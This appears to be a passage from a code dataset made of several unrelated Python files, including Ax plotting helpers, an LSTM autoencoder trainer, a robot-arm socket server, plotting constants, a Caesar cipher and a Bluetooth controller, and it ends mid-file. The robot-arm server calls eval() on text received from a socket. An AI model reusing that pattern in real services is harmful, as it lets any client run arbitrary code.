\"x\": 1,\n \"y\": 0.5,\n \"ticksuffix\": \"%\" if rel else \"\",\n \"tickfont\": {\"size\": 8},\n },\n \"colorscale\": [\n (i / (len(blue_scale) - 1), rgb(v)) for i, v in enumerate(blue_scale)\n ],\n \"xaxis\": \"x2\",\n \"yaxis\": \"y2\",\n \"z\": sd_plt,\n }\n\n f_trace.update(CONTOUR_CONFIG)\n sd_trace.update(CONTOUR_CONFIG)\n\n # get in-sample arms\n arm_names = list(arm_data[\"in_sample\"].keys())\n arm_x = [\n arm_data[\"in_sample\"][arm_name][\"parameters\"][xvar] for arm_name in arm_names\n ]\n arm_y = [\n arm_data[\"in_sample\"][arm_name][\"parameters\"][yvar] for arm_name in arm_names\n ]\n arm_text = []\n for arm_name in arm_names:\n atext = f\"Arm {arm_name}\"\n params = arm_data[\"in_sample\"][arm_name][\"parameters\"]\n ys = arm_data[\"in_sample\"][arm_name][\"y\"]\n ses = arm_data[\"in_sample\"][arm_name][\"se\"]\n for yname in ys.keys():\n sem_str = f\"{ses[yname]}\" if ses[yname] is None else f\"{ses[yname]:.6g}\"\n y_str = f\"{ys[yname]}\" if ys[yname] is None else f\"{ys[yname]:.6g}\"\n atext += f\"
{yname}: {y_str} (SEM: {sem_str})\"\n for pname in params.keys():\n pval = params[pname]\n pstr = f\"{pval:.6g}\" if isinstance(pval, float) else f\"{pval}\"\n atext += f\"
{pname}: {pstr}\"\n arm_text.append(atext)\n\n # configs for in-sample arms\n base_in_sample_arm_config = {\n \"hoverinfo\": \"text\",\n \"legendgroup\": \"In-sample\",\n \"marker\": {\"color\": \"black\", \"symbol\": 1, \"opacity\": 0.5},\n \"mode\": \"markers\",\n \"name\": \"In-sample\",\n \"text\": arm_text,\n \"type\": \"scatter\",\n \"x\": arm_x,\n \"y\": arm_y,\n }\n\n f_in_sample_arm_trace = {\"xaxis\": \"x\", \"yaxis\": \"y\"}\n\n sd_in_sample_arm_trace = {\"showlegend\": False, \"xaxis\": \"x2\", \"yaxis\": \"y2\"}\n\n # pyre-fixme[6]: For 1st param expected `SupportsKeysAndGetItem[str, str]` but\n # got `Dict[str, Union[Dict[str, Union[float, str]], List[typing.Any], str]]`.\n f_in_sample_arm_trace.update(base_in_sample_arm_config)\n # pyre-fixme[6]: For 1st param expected `SupportsKeysAndGetItem[str, Union[bool,\n # str]]` but got `Dict[str, Union[Dict[str, Union[float, str]], List[typing.Any],\n # str]]`.\n sd_in_sample_arm_trace.update(base_in_sample_arm_config)\n\n traces = [f_trace, sd_trace, f_in_sample_arm_trace, sd_in_sample_arm_trace]\n\n # iterate over out-of-sample arms\n for i, generator_run_name in enumerate(arm_data[\"out_of_sample\"].keys()):\n symbol = i + 2 # symbols starts from 2 for candidate markers\n\n ax = []\n ay = []\n atext = []\n\n for arm_name in arm_data[\"out_of_sample\"][generator_run_name].keys():\n ax.append(\n arm_data[\"out_of_sample\"][generator_run_name][arm_name][\"parameters\"][\n xvar\n ]\n )\n ay.append(\n arm_data[\"out_of_sample\"][generator_run_name][arm_name][\"parameters\"][\n yvar\n ]\n )\n atext.append(\"Candidate \" + arm_name + \"\")\n\n traces.append(\n {\n \"hoverinfo\": \"text\",\n \"legendgroup\": generator_run_name,\n \"marker\": {\"color\": \"black\", \"symbol\": symbol, \"opacity\": 0.5},\n \"mode\": \"markers\",\n \"name\": generator_run_name,\n \"text\": atext,\n \"type\": \"scatter\",\n \"xaxis\": \"x\",\n \"x\": ax,\n \"yaxis\": \"y\",\n \"y\": ay,\n }\n )\n traces.append(\n {\n \"hoverinfo\": \"text\",\n \"legendgroup\": generator_run_name,\n \"marker\": {\"color\": \"black\", \"symbol\": symbol, \"opacity\": 0.5},\n \"mode\": \"markers\",\n \"name\": \"In-sample\",\n \"showlegend\": False,\n \"text\": atext,\n \"type\": \"scatter\",\n \"x\": ax,\n \"xaxis\": \"x2\",\n \"y\": ay,\n \"yaxis\": \"y2\",\n }\n )\n\n return traces\n\n\ndef axis_range(grid: List[float], is_log: bool) -> List[float]:\n if is_log:\n return [math.log10(min(grid)), math.log10(max(grid))]\n else:\n return [min(grid), max(grid)]\n\n\ndef relativize(m_t: float, sem_t: float, m_c: float, sem_c: float) -> List[float]:\n r_hat = (m_t - m_c) / abs(m_c) - sem_c**2 * m_t / abs(m_c) ** 3\n variance = (sem_t**2 + (m_t / m_c * sem_c) ** 2) / m_c**2\n return [r_hat, math.sqrt(variance)]\n\n\ndef relativize_data(\n f: List[float],\n sd: List[float],\n rel: bool,\n # pyre-fixme[2]: Parameter annotation cannot contain `Any`.\n arm_data: Dict[Any, Any],\n metric: str,\n) -> List[List[float]]:\n # if relative, extract status quo & compute ratio\n f_final = [] if rel else f\n sd_final = [] if rel else sd\n\n if rel:\n f_sq = arm_data[\"in_sample\"][arm_data[\"status_quo_name\"]][\"y\"][metric]\n sd_sq = arm_data[\"in_sample\"][arm_data[\"status_quo_name\"]][\"se\"][metric]\n\n for i in range(len(f)):\n res = relativize(f[i], sd[i], f_sq, sd_sq)\n f_final.append(100 * res[0])\n sd_final.append(100 * res[1])\n\n return [f_final, sd_final]\n\n\ndef rgb(arr: List[int]) -> str:\n return \"rgb({},{},{})\".format(*arr)\n\n\ndef infer_is_relative(\n model: ModelBridge, metrics: List[str], non_constraint_rel: bool\n) -> Dict[str, bool]:\n \"\"\"Determine whether or not to relativize a metric.\n\n Metrics that are constraints will get this decision from their `relative` flag.\n Other metrics will use the `default_rel`.\n\n Args:\n model: model fit on metrics.\n metrics: list of metric names.\n non_constraint_rel: whether or not to relativize non-constraint metrics\n\n Returns:\n Dict[str, bool] containing whether or not to relativize each input metric.\n \"\"\"\n relative = {}\n constraint_relativity = {}\n if model._optimization_config:\n constraints = not_none(model._optimization_config).outcome_constraints\n constraint_relativity = {\n constraint.metric.name: constraint.relative for constraint in constraints\n }\n for metric in metrics:\n if metric not in constraint_relativity:\n relative[metric] = non_constraint_rel\n else:\n relative[metric] = constraint_relativity[metric]\n return relative\n\n\ndef slice_config_to_trace(\n # pyre-fixme[2]: Parameter must be annotated.\n arm_data,\n # pyre-fixme[2]: Parameter must be annotated.\n arm_name_to_parameters,\n f: List[float],\n # pyre-fixme[2]: Parameter must be annotated.\n fit_data,\n # pyre-fixme[2]: Parameter must be annotated.\n grid,\n metric: str,\n # pyre-fixme[2]: Parameter must be annotated.\n param,\n rel: bool,\n # pyre-fixme[2]: Parameter must be annotated.\n setx,\n sd: List[float],\n # pyre-fixme[2]: Parameter must be annotated.\n is_log,\n # pyre-fixme[2]: Parameter must be annotated.\n visible,\n) -> List[Dict[str, Any]]:\n # format data\n res = relativize_data(f, sd, rel, arm_data, metric)\n f_final = res[0]\n sd_final = res[1]\n\n # get data for standard deviation fill plot\n sd_upper = []\n sd_lower = []\n for i in range(len(sd)):\n sd_upper.append(f_final[i] + 2 * sd_final[i])\n sd_lower.append(f_final[i] - 2 * sd_final[i])\n grid_rev = list(reversed(grid))\n sd_lower_rev = list(reversed(sd_lower))\n sd_x = grid + grid_rev\n sd_y = sd_upper + sd_lower_rev\n\n # get data for observed arms and error bars\n arm_x = []\n arm_y = []\n arm_sem = []\n for row in fit_data:\n parameters = arm_name_to_parameters[row[\"arm_name\"]]\n plot = True\n for p in setx.keys():\n if p != param and parameters[p] != setx[p]:\n plot = False\n if plot:\n arm_x.append(parameters[param])\n arm_y.append(row[\"mean\"])\n arm_sem.append(row[\"sem\"])\n\n arm_res = relativize_data(arm_y, arm_sem, rel, arm_data, metric)\n arm_y_final = arm_res[0]\n arm_sem_final = [x * 2 if x is not None else None for x in arm_res[1]]\n\n # create traces\n f_trace = {\n \"x\": grid,\n \"y\": f_final,\n \"showlegend\": False,\n \"hoverinfo\": \"x+y\",\n \"line\": {\"color\": \"rgba(128, 177, 211, 1)\"},\n \"visible\": visible,\n }\n\n arms_trace = {\n \"x\": arm_x,\n \"y\": arm_y_final,\n \"mode\": \"markers\",\n \"error_y\": {\n \"type\": \"data\",\n \"array\": arm_sem_final,\n \"visible\": True,\n \"color\": \"black\",\n },\n \"line\": {\"color\": \"black\"},\n \"showlegend\": False,\n \"hoverinfo\": \"x+y\",\n \"visible\": visible,\n }\n\n sd_trace = {\n \"x\": sd_x,\n \"y\": sd_y,\n \"fill\": \"toself\",\n \"fillcolor\": \"rgba(128, 177, 211, 0.2)\",\n \"line\": {\"color\": \"rgba(128, 177, 211, 0.0)\"},\n \"showlegend\": False,\n \"hoverinfo\": \"none\",\n \"visible\": visible,\n }\n\n traces = [sd_trace, f_trace, arms_trace]\n\n # iterate over out-of-sample arms\n for i, generator_run_name in enumerate(arm_data[\"out_of_sample\"].keys()):\n ax = []\n ay = []\n asem = []\n atext = []\n\n for arm_name in arm_data[\"out_of_sample\"][generator_run_name].keys():\n parameters = arm_data[\"out_of_sample\"][generator_run_name][arm_name][\n \"parameters\"\n ]\n plot = True\n for p in setx.keys():\n if p != param and parameters[p] != setx[p]:\n plot = False\n if plot:\n ax.append(parameters[param])\n ay.append(\n arm_data[\"out_of_sample\"][generator_run_name][arm_name][\"y_hat\"][\n metric\n ]\n )\n asem.append(\n arm_data[\"out_of_sample\"][generator_run_name][arm_name][\"se_hat\"][\n metric\n ]\n )\n atext.append(\"Candidate \" + arm_name + \"\")\n\n out_of_sample_arm_res = relativize_data(ay, asem, rel, arm_data, metric)\n ay_final = out_of_sample_arm_res[0]\n asem_final = [x * 2 for x in out_of_sample_arm_res[1]]\n\n traces.append(\n {\n \"hoverinfo\": \"text\",\n \"legendgroup\": generator_run_name,\n \"marker\": {\"color\": \"black\", \"symbol\": i + 1, \"opacity\": 0.5},\n \"mode\": \"markers\",\n \"error_y\": {\n \"type\": \"data\",\n \"array\": asem_final,\n \"visible\": True,\n \"color\": \"black\",\n },\n \"name\": generator_run_name,\n \"text\": atext,\n \"type\": \"scatter\",\n \"xaxis\": \"x\",\n \"x\": ax,\n \"yaxis\": \"y\",\n \"y\": ay_final,\n \"visible\": visible,\n }\n )\n\n return traces\n\n\ndef build_filter_trial(keep_trial_indices: List[int]) -> Callable[[Observation], bool]:\n \"\"\"Creates a callable that filters observations based on trial_index\"\"\"\n\n def trial_filter(obs: Observation) -> bool:\n return obs.features.trial_index in keep_trial_indices\n\n return trial_filter\n\n\ndef compose_annotation(\n caption: str, x: float = 0.0, y: float = -0.15\n) -> List[Dict[str, Any]]:\n if not caption:\n return []\n return [\n {\n \"showarrow\": False,\n \"text\": caption,\n \"x\": x,\n \"xanchor\": \"left\",\n \"xref\": \"paper\",\n \"y\": y,\n \"yanchor\": \"top\",\n \"yref\": \"paper\",\n \"align\": \"left\",\n },\n ]\n","repo_name":"facebook/Ax","sub_path":"ax/plot/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":33175,"program_lang":"python","lang":"en","doc_type":"code","stars":2182,"dataset":"github-code","pt":"77"} +{"seq_id":"36899334596","text":"import json\nimport os\nimport sys\nfrom typing import Optional\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Subset, DataLoader\nfrom transformers import BertTokenizerFast\n\nDEVICE = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\n# Use BERT's vocabulary as a slight simplification\nLSTMAutoencoderSubwordTokenizer = BertTokenizerFast\n\n\nclass LSTMAutoencoder(nn.Module):\n def __init__(self, vocab_size, embedding_dim, hidden_size, max_length, dropout=0.0, bidirectional=False,\n padding_idx=0):\n super().__init__()\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n self.hidden_size = hidden_size\n self.dropout = dropout\n self.bidirectional = bidirectional\n self.padding_idx = padding_idx\n self.max_length = max_length\n\n self.num_directions = 2 if bidirectional else 1\n\n self.embedder = nn.Embedding(num_embeddings=self.vocab_size, embedding_dim=self.embedding_dim,\n padding_idx=self.padding_idx)\n self.lstm = nn.LSTM(input_size=self.embedding_dim, hidden_size=self.hidden_size,\n bidirectional=self.bidirectional, batch_first=True)\n self.decoders = nn.ModuleList([nn.Linear(in_features=self.num_directions*self.hidden_size,\n out_features=self.vocab_size) for _ in range(self.max_length)])\n\n @staticmethod\n def from_pretrained(model_dir):\n with open(os.path.join(model_dir, \"lstmae_config.json\"), \"r\", encoding=\"utf-8\") as f:\n config = json.load(f)\n\n instance = LSTMAutoencoder(**config)\n instance.load_state_dict(torch.load(os.path.join(model_dir, \"lstmae.th\"), map_location=DEVICE))\n return instance\n\n def save_pretrained(self, model_dir):\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n\n with open(os.path.join(model_dir, \"lstmae_config.json\"), \"w\", encoding=\"utf-8\") as f:\n json.dump({\n \"vocab_size\": self.vocab_size,\n \"embedding_dim\": self.embedding_dim,\n \"hidden_size\": self.hidden_size,\n \"max_length\": self.max_length,\n \"dropout\": self.dropout,\n \"bidirectional\": self.bidirectional,\n \"padding_idx\": self.padding_idx\n }, fp=f, indent=4)\n\n torch.save(self.state_dict(), os.path.join(model_dir, \"lstmae.th\"))\n\n def forward(self, input_ids: torch.Tensor,\n attention_mask: Optional[torch.Tensor] = None,\n labels: Optional[torch.Tensor] = None):\n batch_size, max_len = input_ids.shape\n _batch_indexer = torch.arange(batch_size)\n\n eff_attention_mask = torch.ones_like(input_ids, dtype=torch.bool) if attention_mask is None else attention_mask\n input_len = torch.sum(eff_attention_mask, dim=1)\n\n embedded_input = torch.dropout(self.embedder(input_ids),\n p=self.dropout,\n train=self.training) # [batch_size, max_length, embedding_size]\n features, _ = self.lstm(embedded_input) # [batch_size, max_length, 2 * hidden_size]\n decomposed_features = features.view(batch_size, max_len, self.num_directions, self.hidden_size)\n\n latent_repr = decomposed_features[_batch_indexer, input_len - 1, 0] # [batch_size, hidden_size]\n if self.num_directions == 2:\n latent_repr = torch.cat((latent_repr, decomposed_features[:, 0, 1]), dim=1) # [batch_size, 2 * hidden_size]\n\n latent_repr = torch.dropout(latent_repr,\n p=self.dropout,\n train=self.training)\n\n logits = []\n for idx_feature in range(self.max_length):\n curr_logits = self.decoders[idx_feature](latent_repr)\n logits.append(curr_logits)\n\n logits = torch.stack(logits, dim=1) # [batch_size, max_length, vocab_size]\n\n ret = {\"logits\": logits}\n if labels is not None:\n criterion = nn.CrossEntropyLoss(ignore_index=self.padding_idx)\n loss = criterion(logits.view(-1, self.vocab_size), labels.view(-1))\n ret[\"loss\"] = loss\n\n return ret\n\n\nif __name__ == \"__main__\":\n from explain_nlp.experimental.data import load_nli, TransformerSeqPairDataset, LABEL_TO_IDX\n import torch.optim as optim\n import logging\n from argparse import ArgumentParser\n\n parser = ArgumentParser()\n parser.add_argument(\"--training_path\", type=str, required=True)\n parser.add_argument(\"--validation_path\", type=str, required=True)\n parser.add_argument(\"--save_dir\", type=str, default=\"lstm_ae_lm\")\n\n parser.add_argument(\"--embedding_size\", type=int, default=300)\n parser.add_argument(\"--hidden_size\", type=int, default=256)\n parser.add_argument(\"--dropout\", type=float, default=0.0)\n parser.add_argument(\"--bidirectional\", action=\"store_true\")\n parser.add_argument(\"--learning_rate\", type=float, default=0.001)\n parser.add_argument(\"--bert_tokenizer_handle\", type=str, default=\"bert-base-uncased\",\n help=\"Handle of BERT tokenizer whose vocabulary is used in the modeling process\")\n\n parser.add_argument(\"--batch_size\", type=int, default=32)\n parser.add_argument(\"--max_length\", type=int, default=41)\n\n parser.add_argument(\"--num_epochs\", type=int, default=100)\n parser.add_argument(\"--validate_every_n_steps\", type=int, default=5000)\n parser.add_argument(\"--early_stopping_rounds\", type=int, default=5)\n\n args = parser.parse_args()\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger.addHandler(logging.StreamHandler(sys.stdout))\n\n tokenizer = LSTMAutoencoderSubwordTokenizer.from_pretrained(args.bert_tokenizer_handle)\n tokenizer.save_pretrained(args.save_dir)\n\n df_train = load_nli(args.training_path)\n df_dev = load_nli(args.validation_path)\n\n train_dataset = TransformerSeqPairDataset.build(first=df_train[\"sentence1\"].values,\n second=df_train[\"sentence2\"].values,\n labels=df_train[\"gold_label\"].apply(\n lambda label_str: LABEL_TO_IDX[\"snli\"][label_str]\n ).values,\n tokenizer=tokenizer, max_seq_len=args.max_length)\n\n dev_dataset = TransformerSeqPairDataset.build(first=df_dev[\"sentence1\"].values,\n second=df_dev[\"sentence2\"].values,\n labels=df_dev[\"gold_label\"].apply(\n lambda label_str: LABEL_TO_IDX[\"snli\"][label_str]\n ).values,\n tokenizer=tokenizer, max_seq_len=args.max_length)\n\n model = LSTMAutoencoder(vocab_size=len(tokenizer),\n embedding_dim=args.embedding_size,\n hidden_size=args.hidden_size,\n max_length=args.max_length,\n dropout=args.dropout,\n bidirectional=args.bidirectional,\n padding_idx=tokenizer.pad_token_id).to(DEVICE)\n optimizer = optim.Adam(params=model.parameters(), lr=args.learning_rate)\n\n with open(os.path.join(args.save_dir, \"training_settings.json\"), \"w\", encoding=\"utf-8\") as f:\n json.dump(vars(args), fp=f, indent=4)\n\n num_train_subsets = (len(train_dataset) + args.validate_every_n_steps - 1) // args.validate_every_n_steps\n best_dev_loss, no_increase = float(\"inf\"), 0\n for idx_epoch in range(args.num_epochs):\n logging.info(f\"*Epoch #{idx_epoch}*\")\n training_loss, train_denom = 0.0, 0\n\n rand_indices = torch.randperm(len(train_dataset))\n for idx_subset in range(num_train_subsets):\n logging.info(f\"Running subset #{idx_subset}\")\n s_sub, e_sub = idx_subset * args.validate_every_n_steps, (idx_subset + 1) * args.validate_every_n_steps\n\n model.train()\n for curr_batch in DataLoader(Subset(train_dataset, rand_indices[s_sub: e_sub]),\n batch_size=args.batch_size):\n res = model(input_ids=curr_batch[\"input_ids\"].to(DEVICE),\n labels=curr_batch[\"input_ids\"].to(DEVICE))\n\n curr_loss = res[\"loss\"]\n training_loss += float(curr_loss)\n train_denom += 1\n\n curr_loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n logging.info(f\"Training loss: {training_loss / train_denom: .4f}\")\n\n dev_loss, dev_denom = 0.0, 0\n model.eval()\n with torch.no_grad():\n for curr_dev_batch in DataLoader(dev_dataset, batch_size=2*args.batch_size):\n res = model(input_ids=curr_dev_batch[\"input_ids\"].to(DEVICE),\n labels=curr_dev_batch[\"input_ids\"].to(DEVICE))\n dev_loss += float(res[\"loss\"])\n dev_denom += 1\n\n dev_loss /= dev_denom\n logging.info(f\"Dev loss: {dev_loss: .4f}\")\n if dev_loss < best_dev_loss:\n best_dev_loss = dev_loss\n no_increase = 0\n\n logging.info(\"Saving new best model!\")\n model.save_pretrained(args.save_dir)\n else:\n no_increase += 1\n\n if no_increase == args.early_stopping_rounds:\n logging.info(f\"Stopping early... Best dev loss: {best_dev_loss: .4f}\")\n exit(0)\n\n","repo_name":"matejklemen/pete","sub_path":"explain_nlp/custom_modules/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":9921,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"12292503046","text":"import time\nimport socket\nimport select\nimport Orion5\nfrom General import ComQuery\n\ndef tryConversion(data):\n try:\n if '.' in data[3]:\n value = float(data[3])\n else:\n value = int(data[3])\n except ValueError:\n print(data)\n print(\"Orion5_Server: ValueError in conversion 1\")\n return None\n return value\n\ncomport = None\nprint('\\nSearching for Orion5...')\ntry:\n while True:\n comport = ComQuery()\n if comport is not None:\n print('Found Orion5, serial port name:', comport.device)\n break\n time.sleep(2)\nexcept KeyboardInterrupt:\n print('\\nExiting...\\n')\n quit()\n\nHOST = 'localhost'\nPORT = 42000\n\nrunning = True\nmax_timeouts = 5\ntimeouts = 0\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((HOST, PORT))\ns.listen(1)\n\norion = Orion5.Orion5(comport.device)\n\nprint('\\nIf MATLAB code crashes, call the orion.stop() function in MATLAB console.')\n\nwhile running:\n print('\\nWaiting for MATLAB')\n\n s.settimeout(None)\n conn, addr = s.accept()\n s.settimeout(0)\n\n connected = True\n print('Connected to MATLAB')\n\n try:\n while connected:\n data = ''\n\n ready = select.select([conn], [], [], 1)\n\n if ready[0]:\n data = conn.recv(1024).decode()\n \n if not data or len(data) == 0 or not ready[0]:\n timeouts += 1\n if timeouts > max_timeouts:\n connected = False\n print('Timeout')\n else:\n timeouts = 0\n\n if data == 'p':\n conn.sendall('p'.encode())\n elif data == 'q':\n break\n else:\n try:\n data = data.split('+')\n data_dict = {\n 'jointID': int(data[0]),\n 'id1': data[1],\n 'id2': data[2]\n }\n except ValueError:\n print(data)\n print(\"Orion5_Server: ValueError in conversion 2\")\n continue\n \n if data_dict['id1'] == 'posFeedback':\n conn.sendall(str(orion.getJointAngles()).encode())\n elif data_dict['id1'] == 'velFeedback':\n conn.sendall(str(orion.getJointSpeeds()).encode())\n elif data_dict['id1'] == 'torFeedback':\n conn.sendall(str(orion.getJointLoads()).encode())\n elif data_dict['id1'] == 'posControl':\n conn.sendall('r'.encode())\n orion.setJointAnglesArray(eval(data[3]))\n elif data_dict['id1'] == 'velControl':\n conn.sendall('r'.encode())\n orion.setJointSpeedsArray(eval(data[3]))\n elif data_dict['id1'] == 'enControl':\n conn.sendall('r'.encode())\n orion.setJointTorqueEnablesArray(eval(data[3]))\n elif data_dict['id1'] == 'config':\n conn.sendall('r'.encode())\n value = tryConversion(data)\n if value == None:\n continue\n orion.setVariable(data_dict['id2'], value)\n elif len(data) == 4:\n conn.sendall('r'.encode())\n value = tryConversion(data)\n if value == None:\n continue\n orion.joints[data_dict['jointID']].setVariable(data_dict['id1'], data_dict['id2'], value)\n elif len(data) == 3:\n var = orion.joints[data_dict['jointID']].getVariable(data_dict['id1'], data_dict['id2'])\n conn.sendall(str(var).encode())\n except KeyboardInterrupt:\n running = False\n print('\\nExiting...\\n')\n finally:\n conn.close()\n if running:\n print('Disconnected from MATLAB')\n\ns.close()\norion.exit()\n","repo_name":"csmithcripps/orion5_ros","sub_path":"Orion5-master/Libraries/Orion5_Server.py","file_name":"Orion5_Server.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72419699769","text":"# -*- coding: utf-8 -*-\nimport matplotlib as mpl\nimport numpy as np\nimport utool as ut\n\n# (print, print_, printDBG, rrr, profile) = utool.inject(__name__, '[custom_constants]', DEBUG=False)\nut.noinject(__name__, '[custom_constants]')\n# GENERAL FONTS\n\nSMALLEST = 6\nSMALLER = 8\nSMALL = 10\nMED = 12\nLARGE = 14\nLARGER = 18\n# fpargs = dict(family=None, style=None, variant=None, stretch=None, fname=None)\n\n\ndef FontProp(*args, **kwargs):\n r\"\"\"overwrite fontproperties with custom settings\n\n Kwargs:\n fname=u'',\n name=u'',\n style=u'normal',\n variant=u'normal',\n weight=u'normal',\n stretch=u'normal',\n size=u'medium'\n \"\"\"\n kwargs['family'] = 'monospace'\n font_prop = mpl.font_manager.FontProperties(*args, **kwargs)\n return font_prop\n\n\nFONTS = ut.DynStruct()\nFONTS.smallest = FontProp(weight='light', size=SMALLEST)\nFONTS.small = FontProp(weight='light', size=SMALL)\nFONTS.smaller = FontProp(weight='light', size=SMALLER)\nFONTS.med = FontProp(weight='light', size=MED)\nFONTS.large = FontProp(weight='light', size=LARGE)\nFONTS.medbold = FontProp(weight='bold', size=MED)\nFONTS.largebold = FontProp(weight='bold', size=LARGE)\n\n# SPECIFIC FONTS\n\nif False:\n # personal\n FONTS.legend = FONTS.small\n FONTS.figtitle = FONTS.med\n FONTS.axtitle = FONTS.small\n FONTS.subtitle = FONTS.med\n # FONTS.xlabel = FONTS.smaller\n FONTS.xlabel = FONTS.small\n FONTS.ylabel = FONTS.small\n FONTS.relative = FONTS.smallest\nelse:\n # personal\n FONTS.legend = FONTS.med\n FONTS.figtitle = FONTS.large\n FONTS.axtitle = FONTS.med\n FONTS.subtitle = FONTS.med\n # FONTS.xlabel = FONTS.smaller\n FONTS.xlabel = FONTS.med\n FONTS.ylabel = FONTS.med\n FONTS.relative = FONTS.med\n\n# COLORS\n\nRED = np.array((255, 0, 0, 255)) / 255.0\nYELLOW = np.array((255, 255, 0, 255)) / 255.0\nGREEN = np.array((0, 255, 0, 255)) / 255.0\nCYAN = np.array((0, 255, 255, 255)) / 255.0\nBLUE = np.array((0, 0, 255, 255)) / 255.0\nMAGENTA = np.array((255, 0, 255, 255)) / 255.0\n\nORANGE = np.array((255, 127, 0, 255)) / 255.0\nBLACK = np.array((0, 0, 0, 255)) / 255.0\nWHITE = np.array((255, 255, 255, 255)) / 255.0\nGRAY = np.array((127, 127, 127, 255)) / 255.0\nLIGHTGRAY = np.array((220, 220, 220, 255)) / 255.0\nDEEP_PINK = np.array((255, 20, 147, 255)) / 255.0\nPINK = np.array((255, 100, 100, 255)) / 255.0\nLIGHT_PINK = np.array((255, 200, 200, 255)) / 255.0\nFALSE_RED = np.array((255, 51, 0, 255)) / 255.0\nTRUE_GREEN = np.array((0, 255, 0, 255)) / 255.0\n# TRUE_BLUE = np.array(( 0, 255, 255, 255)) / 255.0\nTRUE_BLUE = np.array((0, 115, 207, 255)) / 255.0\nDARK_GREEN = np.array((0, 127, 0, 255)) / 255.0\nDARK_BLUE = np.array((0, 0, 127, 255)) / 255.0\nDARK_RED = np.array((127, 0, 0, 255)) / 255.0\nDARK_ORANGE = np.array((127, 63, 0, 255)) / 255.0\nDARK_YELLOW = np.array((127, 127, 0, 255)) / 255.0\nPURPLE = np.array((102, 0, 153, 255)) / 255.0\nBRIGHT_PURPLE = np.array((255, 0, 255, 255)) / 255.0\nLIGHT_PURPLE = np.array((255, 102, 255, 255)) / 255.0\nBRIGHT_GREEN = np.array((39, 255, 20, 255)) / 255.0\nPURPLE2 = np.array((150, 51, 200, 255)) / 255.0\nLIGHT_BLUE = np.array((102, 100, 255, 255)) / 255.0\nLIGHT_GREEN = np.array((102, 255, 102, 255)) / 255.0\nNEUTRAL = np.array((225, 229, 231, 255)) / 255.0\nNEUTRAL_BLUE = np.array((159, 159, 241, 255)) / 255.0\nUNKNOWN_PURP = PURPLE\n\n\n# GOLDEN RATIOS\nPHI_numer = 1 + np.sqrt(5)\nPHI_denom = 2.0\nPHI = PHI_numer / PHI_denom\n\n\ndef golden_wh2(sz):\n return (PHI * sz, sz)\n\n\ndef golden_wh(x):\n 'returns a width / height with a golden aspect ratio'\n return list(map(int, list(map(round, (x * 0.618, x * 0.312)))))\n\n\n# FIGURE GEOMETRY\nDPI = 96\n# FIGSIZE = (24) # default windows fullscreen\nFIGSIZE_MED = (12, 6)\nFIGSIZE_SQUARE = (12, 12)\nFIGSIZE_GOLD = golden_wh2(8)\nFIGSIZE_BIGGER = (24, 12)\nFIGSIZE_HUGE = (32, 16)\n\n# FIGSIZE = FIGSIZE_MED\n# Quality drawings\nFIGSIZE = FIGSIZE_GOLD\n","repo_name":"WildMeOrg/wildbook-ia","sub_path":"wbia/plottool/custom_constants.py","file_name":"custom_constants.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"77"} +{"seq_id":"25848230804","text":"# Caesar Cipher is crypting a message by shifting the letters\n\ndef cCipher(str1, shift = 2):\n if (type(str1) == str):\n \n str3 = [] \n for i in range(0,len(str1)):\n\n str3.append(ord(str1[i]) + shift)\n \n mystr = '' # starting an empty string\n\n for i in str3:\n mystr = mystr + chr(i) # converting the ascii numbers into characters and concatinating them\n return mystr\n else:\n print('the input is not a string')\n return 0\n\n\nprint(cCipher('i love you', 3))\n\n","repo_name":"ovravindra/RavindraML","sub_path":"cCipher.py","file_name":"cCipher.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35298335368","text":"import asyncio\nfrom bleak import BleakScanner, BleakClient\n\nreceived = asyncio.Event()\n\n\ndef notify_callback(sender: int, data: bytearray):\n global received\n print(\"received: {}: {}\".format(sender, data))\n received.set()\n\n\nasync def run():\n devices = await BleakScanner.discover()\n for d in devices:\n if d.name == 'SldrOne':\n async with BleakClient(d.address) as client:\n print('Connecting to: {}'.format(d))\n print('connected: {}'.format(await client.connect()))\n IO_CTRL_CHARACTERISTIC_UUID = \"7da5b2e6-071c-4601-9fde-ecaf291d0a04\"\n IO_CTRL_READ_CHARACTERISTIC_UUID = \"eaa8212a-3551-4e98-adeb-0b68957a215a\"\n READ_CHARACTERISTIC_UUID = \"c2720639-bdfc-4b8e-896d-b5bea0479976\"\n WRITE_CHARACTERISTIC_UUID = \"5a861ccb-687b-459a-af01-347792f07a0c\"\n print('registering callback on READ_CHARACTERISTIC_UUID')\n asyncio.ensure_future(client.start_notify(READ_CHARACTERISTIC_UUID, notify_callback))\n print('registering callback on IO_CTRL_READ_CHARACTERISTIC_UUID')\n asyncio.ensure_future(client.start_notify(IO_CTRL_READ_CHARACTERISTIC_UUID, notify_callback))\n print('getting services')\n services = await client.get_services()\n print('writing')\n await client.write_gatt_char(IO_CTRL_CHARACTERISTIC_UUID, bytes(b'\\x04\\x09\\x0c\\xb0\\x00\\xc9')) #BT_ATT_OP_WRITE_REQ\n print('wrote')\n await asyncio.sleep(60)\n await client.disconnect()\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(run())","repo_name":"Brenden-Morales/slider-re","sub_path":"slide.py","file_name":"slide.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43787351290","text":"#!/usr/bin/env python3\ndef write_txt():\n\timport sys\n\t\n\tRNA = sys.argv[1]\n\teach_line_100 = len(RNA)//100\n\n\tname = input(\"Write the name of species : \")\n\n\tnewfile = open(\"./Gene.txt\", 